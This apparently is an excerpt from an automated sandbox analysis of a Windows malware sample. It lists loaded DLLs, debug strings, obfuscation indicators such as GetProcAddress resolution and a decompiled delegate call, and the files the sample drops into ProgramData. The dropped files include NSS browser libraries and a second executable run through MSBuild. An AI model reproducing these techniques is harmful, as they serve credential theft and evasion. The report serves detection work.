Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\ProgramData\EHDHIDAEHC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: minelabfoto.pdb( source: mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: minelabfoto.pdb source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: PE.pdbH] source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\kfqXL.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.000000000426C000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2098035068.0000000005634000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source:	Binary string: PE.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E7A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003E7A40

PE file contains sections with non-standard names

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ECDD5 push ecx; ret	0_2_003ECDE8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB536 push ecx; ret	0_2_6C2CB549
Source: C:\ProgramData\EHDHIDAEHC.exe	Code function: 4_2_054BCBC0 pushad ; retf	4_2_054BCBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041CDD5 push ecx; ret	6_2_0041CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE11BF9 push ecx; ret	6_2_1FFB4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE110C8 push ecx; ret	6_2_20013552

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, zcrmeG4DKc05Qj8A7l.cs	High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'

Drops PE files

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\EHDHIDAEHC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\EHDHIDAEHC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003E7A40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
